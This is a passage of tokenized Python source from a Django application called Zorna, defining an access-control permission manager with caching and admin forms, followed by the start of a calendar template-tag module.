'<STR_LIT>' , '<STR_LIT>' ) , ) <EOL> ordering = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> db_table = settings . TABLE_PREFIX + "<STR_LIT>" <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT>" % ( <EOL> unicode ( self . content_type . app_label ) , <EOL> unicode ( self . codename ) ) <EOL> class ACLPermissionManager ( models . Manager ) : <EOL> cache_childs_groups = { } <EOL> def copy_permissions ( self , obj_source , perm_source , obj_target , perm_target ) : <EOL> ct_src = ContentType . objects . get_for_model ( obj_source ) <EOL> ct_target = ContentType . objects . get_for_model ( obj_target ) <EOL> self . filter ( object_id = obj_target . pk , content_type = ct_target , <EOL> permission__codename = perm_target ) . delete ( ) <EOL> perms = self . filter ( <EOL> object_id = obj_source . pk , content_type = ct_src , permission__codename = perm_source ) <EOL> check = get_acl_for_model ( obj_target ) <EOL> for p in perms : <EOL> if p . user : <EOL> check . add_perm ( perm_target , obj_target , p . user , p . acltype ) <EOL> else : <EOL> check . add_perm ( perm_target , obj_target , p . group , p . acltype ) <EOL> def cache_acl_groups ( self , object ) : <EOL> acl_groups_permissions = cache . get ( ACL_GROUPS_PERMISSIONS_CACHE ) <EOL> if acl_groups_permissions is None : <EOL> acl_groups_permissions = { } <EOL> ct = ContentType . objects . get_for_model ( object ) <EOL> acl_groups_permissions [ ct . pk ] = { } <EOL> acl_groups_permissions [ ct . pk ] [ object . id ] = { } <EOL> perms = self . filter ( group__isnull = False , object_id = object . pk , content_type = ct ) . values ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) <EOL> for p in perms : <EOL> try : <EOL> groups = acl_groups_permissions [ ct . pk ] [ <EOL> object . id ] [ p [ '<STR_LIT>' ] ] <EOL> except : <EOL> groups = acl_groups_permissions [ ct . pk ] [ <EOL> object . id ] [ p [ '<STR_LIT>' ] ] = [ ] <EOL> if p [ '<STR_LIT>' ] > defines . ZORNA_GROUP_REGISTERED : <EOL> if p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_DENY_CHILDS or p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW_CHILDS : <EOL> if p [ '<STR_LIT>' ] not in self . cache_childs_groups : <EOL> self . cache_childs_groups [ p [ '<STR_LIT>' ] ] = UserGroup . objects . get ( <EOL> pk = p [ '<STR_LIT>' ] ) . get_descendants ( True ) <EOL> childs = self . cache_childs_groups [ p [ '<STR_LIT>' ] ] <EOL> childs_id = [ g . pk for g in childs ] <EOL> if p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_DENY_CHILDS : <EOL> groups = [ groups - childs_id for groups , childs_id in zip ( <EOL> groups , childs_id ) ] <EOL> else : <EOL> groups . extend ( childs_id ) <EOL> elif p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW : <EOL> groups . append ( p [ '<STR_LIT>' ] ) <EOL> else : <EOL> groups = [ g for g in groups if g != p [ '<STR_LIT>' ] ] <EOL> else : <EOL> if p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW or p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW_CHILDS : <EOL> groups . append ( p [ '<STR_LIT>' ] ) <EOL> else : <EOL> groups = [ g for g in groups if g != p [ '<STR_LIT>' ] ] <EOL> acl_groups_permissions [ ct . pk ] [ object . id ] [ <EOL> p [ '<STR_LIT>' ] ] = groups <EOL> cache . set ( ACL_GROUPS_PERMISSIONS_CACHE , acl_groups_permissions ) <EOL> return acl_groups_permissions <EOL> def get_acl_groups_by_object ( self , object , permission ) : <EOL> """<STR_LIT>""" <EOL> ct = ContentType . objects . get_for_model ( object ) <EOL> acl_groups_permissions = cache . get ( ACL_GROUPS_PERMISSIONS_CACHE ) <EOL> if acl_groups_permissions is None : <EOL> acl_groups_permissions = self . cache_acl_groups ( object ) <EOL> else : <EOL> try : <EOL> acl_groups_permissions [ ct . pk ] [ object . pk ] <EOL> except KeyError : <EOL> acl_groups_permissions = self . cache_acl_groups ( object ) <EOL> try : <EOL> return acl_groups_permissions [ ct . pk ] [ object . id ] [ permission ] <EOL> except : <EOL> return [ ] <EOL> def get_acl_by_object ( self , object , permission ) : <EOL> """<STR_LIT>""" <EOL> allowed_groups = self . get_acl_groups_by_object ( object , permission ) <EOL> if defines . ZORNA_GROUP_PUBLIC in allowed_groups or defines . ZORNA_GROUP_REGISTERED in allowed_groups : <EOL> members = User . objects . filter ( <EOL> is_active = <NUM_LIT:1> ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> ct = ContentType . objects . get_for_model ( object ) <EOL> members = User . objects . filter ( Q ( user_profile__groups__in = allowed_groups ) | Q ( <EOL> aclpermission__permission__codename = permission , aclpermission__content_type = ct , aclpermission__object_id = object . pk ) ) . distinct ( ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return members <EOL> def get_acl_users_by_object ( self , object , permission ) : <EOL> """<STR_LIT>""" <EOL> ct = ContentType . objects . get_for_model ( object ) <EOL> members = User . objects . filter ( <EOL> Q ( aclpermission__permission__codename = permission , aclpermission__content_type = ct , <EOL> aclpermission__object_id = object . pk ) ) . distinct ( ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return members <EOL> def get_acl_objects_by_model ( self , user , model , permission ) : <EOL> """<STR_LIT>""" <EOL> contenttype = ContentType . objects . get_for_model ( model ) <EOL> ret = [ ] <EOL> user_id = <NUM_LIT:0> if user . is_anonymous ( ) else user . id <EOL> acl_users_permissions = cache . get ( ACL_USERS_PERMISSIONS_CACHE ) <EOL> if acl_users_permissions is None : <EOL> acl_users_permissions = self . cache_user_permissions ( user ) <EOL> else : <EOL> try : <EOL> acl_users_permissions [ user_id ] <EOL> except KeyError : <EOL> acl_users_permissions = self . cache_user_permissions ( user ) <EOL> try : <EOL> for obj , perm in acl_users_permissions [ user_id ] [ contenttype . id ] . iteritems ( ) : <EOL> try : <EOL> if perm [ permission ] : <EOL> ret . append ( obj ) <EOL> except : <EOL> pass <EOL> except : <EOL> pass <EOL> return ret <EOL> def cache_user_permissions ( self , user ) : <EOL> acl_users_permissions = cache . get ( ACL_USERS_PERMISSIONS_CACHE ) <EOL> if acl_users_permissions is None : <EOL> acl_users_permissions = { } <EOL> if user . is_anonymous ( ) : <EOL> user_id = <NUM_LIT:0> <EOL> user_groups = [ ] <EOL> else : <EOL> user_groups = [ g . id for g in user . get_profile ( ) . groups . all ( ) ] <EOL> user_id = user . id <EOL> acl_users_permissions [ user_id ] = { } <EOL> perms = self . filter ( group__isnull = False ) . values ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> for p in perms : <EOL> if not acl_users_permissions [ user_id ] . has_key ( p [ '<STR_LIT>' ] ) : <EOL> acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] = { } <EOL> if not acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] . has_key ( p [ '<STR_LIT>' ] ) : <EOL> acl_users_permissions [ user_id ] [ p [ <EOL> '<STR_LIT>' ] ] [ p [ '<STR_LIT>' ] ] = { } <EOL> bok = False <EOL> if p [ '<STR_LIT>' ] == defines . ZORNA_GROUP_PUBLIC : <EOL> bok = True <EOL> elif p [ '<STR_LIT>' ] == defines . ZORNA_GROUP_ANONYMOUS and user . is_anonymous ( ) : <EOL> bok = True <EOL> elif p [ '<STR_LIT>' ] == defines . ZORNA_GROUP_REGISTERED and user . is_anonymous ( ) is False : <EOL> bok = True <EOL> elif p [ '<STR_LIT>' ] > defines . ZORNA_GROUP_REGISTERED : <EOL> if p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_DENY_CHILDS or p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW_CHILDS : <EOL> if p [ '<STR_LIT>' ] not in self . cache_childs_groups : <EOL> self . cache_childs_groups [ p [ '<STR_LIT>' ] ] = UserGroup . objects . get ( <EOL> pk = p [ '<STR_LIT>' ] ) . get_descendants ( True ) <EOL> childs = self . cache_childs_groups [ p [ '<STR_LIT>' ] ] <EOL> for c in childs : <EOL> if c . pk in user_groups : <EOL> bok = True <EOL> break <EOL> else : <EOL> if p [ '<STR_LIT>' ] in user_groups : <EOL> bok = True <EOL> if bok : <EOL> acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] [ p [ '<STR_LIT>' ] ] [ p [ '<STR_LIT>' ] ] = True if p [ <EOL> '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW_CHILDS or p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW else False <EOL> acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] [ <EOL> p [ '<STR_LIT>' ] ] [ '<STR_LIT>' ] = p [ '<STR_LIT>' ] <EOL> if user_id : <EOL> perms = self . filter ( user = user ) . values ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> for p in perms : <EOL> if p [ '<STR_LIT>' ] not in acl_users_permissions [ user_id ] : <EOL> acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] = { } <EOL> if p [ '<STR_LIT>' ] not in acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] : <EOL> acl_users_permissions [ user_id ] [ p [ <EOL> '<STR_LIT>' ] ] [ p [ '<STR_LIT>' ] ] = { } <EOL> acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] [ p [ '<STR_LIT>' ] ] [ p [ <EOL> '<STR_LIT>' ] ] = True if p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW else False <EOL> acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] [ <EOL> p [ '<STR_LIT>' ] ] [ '<STR_LIT>' ] = p [ '<STR_LIT>' ] <EOL> cache . set ( ACL_USERS_PERMISSIONS_CACHE , acl_users_permissions ) <EOL> return acl_users_permissions <EOL> def user_permissions ( self , user , obj , perm ) : <EOL> """<STR_LIT>""" <EOL> user_id = <NUM_LIT:0> if user . is_anonymous ( ) else user . id <EOL> acl_users_permissions = cache . get ( ACL_USERS_PERMISSIONS_CACHE ) <EOL> if acl_users_permissions is None : <EOL> acl_users_permissions = self . cache_user_permissions ( user ) <EOL> else : <EOL> try : <EOL> acl_users_permissions [ user_id ] <EOL> except KeyError : <EOL> acl_users_permissions = self . cache_user_permissions ( user ) <EOL> try : <EOL> ct = ContentType . objects . get_for_model ( obj ) <EOL> return acl_users_permissions [ user_id ] [ ct . pk ] [ obj . id ] [ perm . codename ] <EOL> except : <EOL> return False <EOL> def group_permissions ( self , group , obj , perm ) : <EOL> try : <EOL> return self . get ( group = group , permission = perm , object = obj . id ) <EOL> except ACLPermission . DoesNotExist : <EOL> return False <EOL> def delete_user_permissions ( self , permission , obj ) : <EOL> ct = ContentType . objects . get_for_model ( obj ) <EOL> ACLPermission . objects . filter ( <EOL> permission__codename = permission , object_id = obj . pk , content_type = ct , user__isnull = False ) . delete ( ) <EOL> PERMISSIONS_TYPES = ( <EOL> ( <NUM_LIT:0> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:3> , '<STR_LIT>' ) , <EOL> ) <EOL> class ACLPermission ( models . Model ) : <EOL> permission = models . ForeignKey ( ACLVerbPermission ) <EOL> object_id = models . IntegerField ( ) <EOL> content_type = models . ForeignKey ( ContentType ) <EOL> user = models . ForeignKey ( User , null = True ) <EOL> group = models . ForeignKey ( UserGroup , null = True , related_name = '<STR_LIT>' ) <EOL> acltype = models . IntegerField ( <EOL> max_length = <NUM_LIT:1> , choices = PERMISSIONS_TYPES , default = <NUM_LIT:0> ) <EOL> content_object = generic . GenericForeignKey ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> objects = ACLPermissionManager ( ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> unique_together = ( ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:user>' , '<STR_LIT>' ) , ) <EOL> db_table = settings . TABLE_PREFIX + "<STR_LIT>" <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT:%s>" % ( <EOL> unicode ( self . permission . codename ) ) <EOL> class ACLGotInvalidModel ( Exception ) : <EOL> pass <EOL> class ACLException ( Exception ) : <EOL> pass <EOL> class NotAModel ( ACLException ) : <EOL> def __init__ ( self , object ) : <EOL> super ( NotAModel , self ) . __init__ ( <EOL> "<STR_LIT>" ) <EOL> class UnsavedModelInstance ( ACLException ) : <EOL> def __init__ ( self , object ) : <EOL> super ( UnsavedModelInstance , self ) . __init__ ( <EOL> "<STR_LIT>" ) <EOL> class ACLMetaclass ( type ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , name , bases , attrs ) : <EOL> new_class = super ( ACLMetaclass , cls ) . __new__ ( cls , name , bases , attrs ) <EOL> if new_class . model is None : <EOL> return new_class <EOL> new_class . perms = { } <EOL> if not isinstance ( new_class . model , ( Model , ModelBase ) ) : <EOL> raise NotAModel ( new_class . model ) <EOL> elif isinstance ( new_class . model , Model ) and not new_class . model . pk : <EOL> raise UnsavedModelInstance ( new_class . model ) <EOL> content_type = ContentType . objects . get_for_model ( new_class . model ) <EOL> current_perms = content_type . model_class ( ) . get_acl_permissions ( ) <EOL> register_acl_for_model ( new_class . model , current_perms ) <EOL> perms = ACLVerbPermission . objects . filter ( content_type = content_type ) <EOL> for perm in perms : <EOL> if current_perms . has_key ( perm . codename ) is False : <EOL> ACLPermission . objects . filter ( permission = perm ) . delete ( ) <EOL> perm . delete ( ) <EOL> continue <EOL> new_class . perms [ perm . codename ] = perm <EOL> func = cls . create_check ( new_class , perm . codename ) <EOL> object_name = new_class . model . _meta . object_name <EOL> func_name = "<STR_LIT>" % ( perm . codename , object_name . lower ( ) ) <EOL> func . short_description = _ ( "<STR_LIT>" ) % { <EOL> '<STR_LIT:object_name>' : new_class . model . _meta . object_name . lower ( ) , <EOL> '<STR_LIT>' : perm . codename } <EOL> func . k = perm . codename <EOL> setattr ( new_class , func_name , func ) <EOL> return new_class <EOL> def create_check ( self , check_name , * args , ** kwargs ) : <EOL> def check ( self , * args , ** kwargs ) : <EOL> granted = self . can ( check_name , * args , ** kwargs ) <EOL> return granted <EOL> return check <EOL> class BaseACL ( object ) : <EOL> model = None <EOL> __metaclass__ = ACLMetaclass <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( BaseACL , self ) . __init__ ( * args , ** kwargs ) <EOL> def get_acl_groups_forms ( self , request , object_id , ** kwargs ) : <EOL> extra_context = { } <EOL> obj = self . model . objects . get ( pk = object_id ) <EOL> ct = ContentType . objects . get_for_model ( obj ) <EOL> extra_context [ "<STR_LIT:object_name>" ] = unicode ( obj ) <EOL> try : <EOL> exclude = kwargs [ '<STR_LIT>' ] <EOL> ob_list = UserGroup . objects . exclude ( pk__in = exclude ) . order_by ( '<STR_LIT>' ) <EOL> except : <EOL> ob_list = UserGroup . objects . all ( ) . order_by ( '<STR_LIT>' ) <EOL> template = '<STR_LIT>' <EOL> extra_context [ "<STR_LIT>" ] = None <EOL> perm_object = obj <EOL> if request . method == '<STR_LIT:POST>' : <EOL> if '<STR_LIT>' not in request . POST : <EOL> pr = request . POST . get ( "<STR_LIT>" , None ) <EOL> if pr : <EOL> perm_object = self . model . objects . get ( pk = pr ) <EOL> extra_context [ "<STR_LIT>" ] = perm_object . pk <EOL> else : <EOL> ACLPermission . objects . filter ( <EOL> object_id = obj . pk , content_type = ct , group__isnull = False ) . delete ( ) <EOL> temp = { } <EOL> for ac in request . POST : <EOL> if ac [ : <NUM_LIT:5> ] == '<STR_LIT>' and request . POST [ ac ] != "<STR_LIT>" : <EOL> acc = ac . split ( '<STR_LIT:_>' ) <EOL> try : <EOL> temp [ int ( acc [ <NUM_LIT:2> ] ) ] . append ( ( <EOL> acc [ <NUM_LIT:1> ] , request . POST [ ac ] ) ) <EOL> except KeyError : <EOL> temp [ int ( acc [ <NUM_LIT:2> ] ) ] = [ ] <EOL> temp [ int ( acc [ <NUM_LIT:2> ] ) ] . append ( ( <EOL> acc [ <NUM_LIT:1> ] , request . POST [ ac ] ) ) <EOL> if len ( temp ) : <EOL> grp = UserGroup . objects . in_bulk ( temp . keys ( ) ) <EOL> for g_id , g in grp . iteritems ( ) : <EOL> for c in temp [ g_id ] : <EOL> self . add_perm ( c [ <NUM_LIT:0> ] , obj , g , c [ <NUM_LIT:1> ] ) <EOL> perm_object = obj <EOL> cache . delete ( ACL_USERS_PERMISSIONS_CACHE ) <EOL> cache . delete ( ACL_GROUPS_PERMISSIONS_CACHE ) <EOL> redirect = request . POST . get ( '<STR_LIT>' , None ) <EOL> if redirect : <EOL> if '<STR_LIT:?>' not in redirect : <EOL> redirect = redirect + '<STR_LIT>' + str ( object_id ) <EOL> else : <EOL> redirect = redirect + '<STR_LIT>' + str ( object_id ) <EOL> return HttpResponseRedirect ( redirect ) <EOL> extra_context [ "<STR_LIT>" ] = { } <EOL> for k , v in self . perms . iteritems ( ) : <EOL> extra_context [ "<STR_LIT>" ] [ k ] = { } <EOL> extra_context [ "<STR_LIT>" ] [ k ] [ '<STR_LIT:text>' ] = _ ( v . name ) <EOL> perm = ACLPermission . objects . select_related ( ) . filter ( <EOL> object_id = perm_object . pk , content_type = ct , group__isnull = False ) <EOL> parentsid = [ ] <EOL> for ob in ob_list : <EOL> if ob . pk > defines . ZORNA_GROUP_REGISTERED : <EOL> ob . show_members = True <EOL> else : <EOL> ob . show_members = False <EOL> ob . verbs = { } <EOL> for k , v in self . perms . iteritems ( ) : <EOL> ob . verbs [ k ] = '<STR_LIT>' <EOL> for g in perm : <EOL> if g . group_id == ob . id and k == g . permission . codename : <EOL> ob . verbs [ k ] = g . acltype <EOL> if ob . parent_id not in parentsid : <EOL> ob . parent_id = <NUM_LIT:0> <EOL> parentsid . append ( ob . pk ) <EOL> extra_context [ '<STR_LIT>' ] = { } <EOL> perm = ACLPermission . objects . select_related ( ) . filter ( <EOL> content_type = ct , group__isnull = False ) . exclude ( object_id = obj . pk ) <EOL> for p in perm : <EOL> try : <EOL> extra_context [ '<STR_LIT>' ] [ <EOL> p . content_object . pk ] = p . content_object <EOL> except : <EOL> pass <EOL> extra_context [ '<STR_LIT>' ] = request . REQUEST . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> extra_context [ '<STR_LIT:object>' ] = obj <EOL> extra_context [ '<STR_LIT>' ] = ob_list <EOL> context = RequestContext ( request ) <EOL> return render_to_response ( template , extra_context , context_instance = context ) <EOL> def get_acl_users_forms ( self , request , object_id , template = '<STR_LIT>' ) : <EOL> extra_context = { } <EOL> obj = self . model . objects . get ( pk = object_id ) <EOL> ct = ContentType . objects . get_for_model ( obj ) <EOL> extra_context [ "<STR_LIT:object_name>" ] = unicode ( obj ) <EOL> acl_template = '<STR_LIT>' <EOL> if request . method == '<STR_LIT:POST>' : <EOL> selected = request . POST . getlist ( '<STR_LIT>' ) <EOL> selected_verbs = request . POST . getlist ( '<STR_LIT>' ) <EOL> ACLPermission . objects . filter ( <EOL> object_id = obj . pk , content_type = ct , user__isnull = False ) . delete ( ) <EOL> ol = User . objects . filter ( pk__in = selected ) <EOL> for u in ol : <EOL> for ac in request . POST : <EOL> if ac [ : <NUM_LIT:5> ] == '<STR_LIT>' and request . POST [ ac ] != "<STR_LIT>" : <EOL> acc = ac . split ( '<STR_LIT:_>' ) <EOL> if acc [ <NUM_LIT:2> ] in selected and long ( acc [ <NUM_LIT:2> ] ) == u . pk : <EOL> self . add_perm ( acc [ <NUM_LIT:1> ] , obj , u , request . POST [ ac ] ) <EOL> u = request . POST . get ( "<STR_LIT:u>" , "<STR_LIT>" ) <EOL> if u : <EOL> u = User . objects . get ( pk = u ) <EOL> check = get_acl_for_model ( obj ) <EOL> for v in selected_verbs : <EOL> check . add_perm ( v , obj , u , defines . ZORNA_PERMISSIONS_ALLOW ) <EOL> cache . delete ( ACL_USERS_PERMISSIONS_CACHE ) <EOL> redirect = request . POST . get ( '<STR_LIT>' , None ) <EOL> if redirect : <EOL> if '<STR_LIT:?>' not in redirect : <EOL> redirect = redirect + '<STR_LIT>' + str ( object_id ) <EOL> else : <EOL> redirect = redirect + '<STR_LIT>' + str ( object_id ) <EOL> return HttpResponseRedirect ( redirect ) <EOL> extra_context [ "<STR_LIT>" ] = { } <EOL> for k , v in self . perms . iteritems ( ) : <EOL> extra_context [ "<STR_LIT>" ] [ k ] = { } <EOL> extra_context [ "<STR_LIT>" ] [ k ] [ '<STR_LIT:text>' ] = _ ( v . name ) <EOL> ob_list = User . objects . filter ( <EOL> aclpermission__user__isnull = False , aclpermission__object_id = obj . pk , aclpermission__content_type = ct ) . distinct ( ) <EOL> perm = ACLPermission . objects . select_related ( ) . filter ( <EOL> object_id = obj . pk , content_type = ct , user__isnull = False ) <EOL> dummy = ob_list <EOL> for ob in dummy : <EOL> ob . verbs = { } <EOL> for k , v in self . perms . iteritems ( ) : <EOL> ob . verbs [ k ] = '<STR_LIT>' <EOL> for g in perm : <EOL> if g . user_id == ob . id and k == g . permission . codename : <EOL> ob . verbs [ k ] = g . acltype <EOL> extra_context [ '<STR_LIT>' ] = dummy <EOL> extra_context [ '<STR_LIT:object>' ] = obj <EOL> extra_context [ '<STR_LIT>' ] = request . REQUEST . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> paginate_by = <NUM_LIT:20> <EOL> paginator = Paginator ( <EOL> ob_list . _clone ( ) , paginate_by , allow_empty_first_page = True ) <EOL> page = request . GET . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> try : <EOL> page_number = int ( page ) <EOL> except ValueError : <EOL> if page == '<STR_LIT>' : <EOL> page_number = paginator . num_pages <EOL> else : <EOL> raise Http404 <EOL> try : <EOL> page_obj = paginator . page ( page_number ) <EOL> except InvalidPage : <EOL> raise Http404 <EOL> extra_context [ '<STR_LIT>' ] = paginator <EOL> extra_context [ '<STR_LIT>' ] = page_obj <EOL> extra_context [ '<STR_LIT>' ] = render_to_string ( <EOL> acl_template , extra_context , context_instance = RequestContext ( request ) ) <EOL> context = RequestContext ( request ) <EOL> if template : <EOL> return render_to_response ( template , extra_context , context_instance = context ) <EOL> else : <EOL> return extra_context <EOL> def has_user_perms ( self , perm , obj , user ) : <EOL> if user . is_superuser : <EOL> return True <EOL> return ACLPermission . objects . user_permissions ( user , obj , perm ) <EOL> def has_group_perms ( self , perm , obj , group ) : <EOL> perms = ACLPermission . objects . group_permissions ( group , obj , perm ) <EOL> return perms <EOL> def can ( self , check , obj , user_or_group , * args , ** kwargs ) : <EOL> if isinstance ( user_or_group , User ) or isinstance ( user_or_group , AnonymousUser ) : <EOL> return self . has_user_perms ( self . perms [ check ] , obj , user_or_group ) <EOL> if isinstance ( user_or_group , UserGroup ) : <EOL> return self . has_group_perms ( self . perms [ check ] , obj , user_or_group ) <EOL> def add_perm ( self , check , obj , user_or_group , acltype ) : <EOL> kwargs = { } <EOL> if isinstance ( user_or_group , User ) : <EOL> kwargs [ '<STR_LIT:user>' ] = user_or_group <EOL> elif isinstance ( user_or_group , UserGroup ) : <EOL> kwargs [ '<STR_LIT>' ] = user_or_group <EOL> else : <EOL> return None <EOL> content_type = ContentType . objects . get_for_model ( obj ) <EOL> kwargs [ '<STR_LIT>' ] = self . perms [ check ] <EOL> kwargs [ '<STR_LIT>' ] = obj . pk <EOL> kwargs [ '<STR_LIT>' ] = content_type <EOL> kwargs [ '<STR_LIT>' ] = acltype <EOL> acl = ACLPermission . objects . get_or_create ( ** kwargs ) <EOL> cache . delete ( ACL_USERS_PERMISSIONS_CACHE ) <EOL> cache . delete ( ACL_GROUPS_PERMISSIONS_CACHE ) <EOL> return acl <EOL> def remove_perm ( self , check , obj , user_or_group , acltype ) : <EOL> kwargs = { } <EOL> if isinstance ( user_or_group , User ) : <EOL> kwargs [ '<STR_LIT:user>' ] = user_or_group <EOL> elif isinstance ( user_or_group , UserGroup ) : <EOL> kwargs [ '<STR_LIT>' ] = user_or_group <EOL> else : <EOL> return False <EOL> content_type = ContentType . objects . get_for_model ( obj ) <EOL> ACLPermission . objects . filter ( <EOL> object_id = obj . pk , content_type = content_type , user = user_or_group , permission = self . perms [ check ] ) . delete ( ) <EOL> cache . delete ( ACL_USERS_PERMISSIONS_CACHE ) <EOL> cache . delete ( ACL_GROUPS_PERMISSIONS_CACHE ) <EOL> return True </s>
<s> import datetime <EOL> from django import template <EOL> from django . template import TemplateSyntaxError <EOL> from django . contrib . auth . models import User <EOL> from django . template import Variable <EOL> from django . core . urlresolvers import reverse <EOL> from schedule . models . events import EventRelation <EOL> from schedule . periods import Period <EOL> from zorna . acl . models import get_allowed_objects <EOL> from zorna . calendars . models import EventDetails , ZornaResourceCalendar <EOL> from zorna . calendars . api import get_resource_calendar , get_events_for_object , get_user_calendars <EOL> register = template . Library ( ) <EOL> def get_last_day_of_month ( year , month ) : <EOL> if ( month == <NUM_LIT:12> ) : <EOL> year += <NUM_LIT:1> <EOL> month = <NUM_LIT:1> <EOL> else : <EOL> month += <NUM_LIT:1> <EOL> return datetime . date ( year , month , <NUM_LIT:1> ) - datetime . timedelta ( <NUM_LIT:1> ) <EOL> def month_cal ( context , year , month ) : <EOL> request = context [ '<STR_LIT>' ] <EOL> ret = [ ] <EOL> if request . user . is_authenticated ( ) : <EOL> evt = EventRelation . objects . get_events_for_object ( request . user ) <EOL> period = Period ( events = evt , start = datetime . datetime ( year , month , <NUM_LIT:1> ) , <EOL> end = datetime . datetime ( year , month , <NUM_LIT:30> ) ) <EOL> occurrences = [ ] <EOL> for o in period . occurrences : <EOL> if period . classify_occurrence ( o ) : <EOL> occurrences . append ( o ) <EOL> first_day_of_month = datetime . date ( year , month , <NUM_LIT:1> ) <EOL> last_day_of_month = get_last_day_of_month ( year , month ) <EOL> first_day_of_calendar = first_day_of_month - datetime . timedelta ( first_day_of_month . weekday ( ) ) <EOL> last_day_of_calendar = last_day_of_month + datetime . timedelta ( <NUM_LIT:7> - last_day_of_month . weekday ( ) ) <EOL> month_cal = [ ] <EOL> week = [ ] <EOL> week_headers = [ ] <EOL> i = <NUM_LIT:0> <EOL> day = first_day_of_calendar <EOL> while day <= last_day_of_calendar : <EOL> if i < <NUM_LIT:7> : <EOL> week_headers . append ( day ) <EOL> cal_day = { } <EOL> cal_day [ '<STR_LIT>' ] = day <EOL> cal_day [ '<STR_LIT>' ] = False <EOL> for occ in ret : <EOL> if day >= occ . start . date ( ) and day <= occ . end . date ( ) : <EOL> cal_day [ '<STR_LIT>' ] = True <EOL> if day . month == month : <EOL> cal_day [ '<STR_LIT>' ] = True <EOL> else : <EOL> cal_day [ '<STR_LIT>' ] = False <EOL> week . append ( cal_day ) <EOL> if day . weekday ( ) == <NUM_LIT:6> : <EOL> month_cal . append ( week ) <EOL> week = [ ] <EOL> i += <NUM_LIT:1> <EOL> day += datetime . timedelta ( <NUM_LIT:1> ) <EOL> return { '<STR_LIT>' : month_cal , '<STR_LIT>' : week_headers } <EOL> register . inclusion_tag ( <EOL> '<STR_LIT>' , takes_context = True ) ( month_cal ) <EOL> @ register . tag ( name = "<STR_LIT>" ) <EOL> def user_calendar_events ( parser , token ) : <EOL> '''<STR_LIT>''' <EOL> bits = token . split_contents ( ) <EOL> if <NUM_LIT:5> != len ( bits ) : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> if bits [ - <NUM_LIT:2> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( <EOL> '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> cal_date = bits [ <NUM_LIT:1> ] <EOL> limit = bits [ <NUM_LIT:2> ] <EOL> varname = bits [ - <NUM_LIT:1> ] <EOL> return user_calendar_events_node ( cal_date , limit , varname ) <EOL> class user_calendar_events_node ( template . Node ) : <EOL> def __init__ ( self , cal_date , limit , var_name ) : <EOL> sd = cal_date [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> if sd : <EOL> sd = map ( int , sd . split ( '<STR_LIT:->' ) ) <EOL> start_date = datetime . datetime ( sd [ <NUM_LIT:0> ] , sd [ <NUM_LIT:1> ] , sd [ <NUM_LIT:2> ] ) <EOL> else : <EOL> start_date = datetime . datetime . today ( ) <EOL> limits = limit [ <NUM_LIT:1> : - <NUM_LIT:1> ] . split ( '<STR_LIT:U+002C>' ) <EOL> self . start_date = start_date - datetime . timedelta ( days = int ( limits [ <NUM_LIT:0> ] ) ) <EOL> self . end_date = start_date + datetime . timedelta ( days = int ( limits [ <NUM_LIT:1> ] ) ) <EOL> self . var_name = var_name <EOL> def render ( self , context ) : <EOL> request = context [ '<STR_LIT>' ] <EOL> events_list = [ ] <EOL> if request . user . is_authenticated ( ) : <EOL> events_list = get_events_for_object ( <EOL> User . objects . get ( pk = request . user . pk ) , <EOL> self . start_date , self . end_date ) <EOL> context [ self . var_name ] = events_list <EOL> return '<STR_LIT>' <EOL> @ register . tag ( name = "<STR_LIT>" ) <EOL> def resource_calendar_events ( parser , token ) : <EOL> '''<STR_LIT>''' <EOL> bits = token . split_contents ( ) <EOL> if <NUM_LIT:6> != len ( bits ) : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> if bits [ - 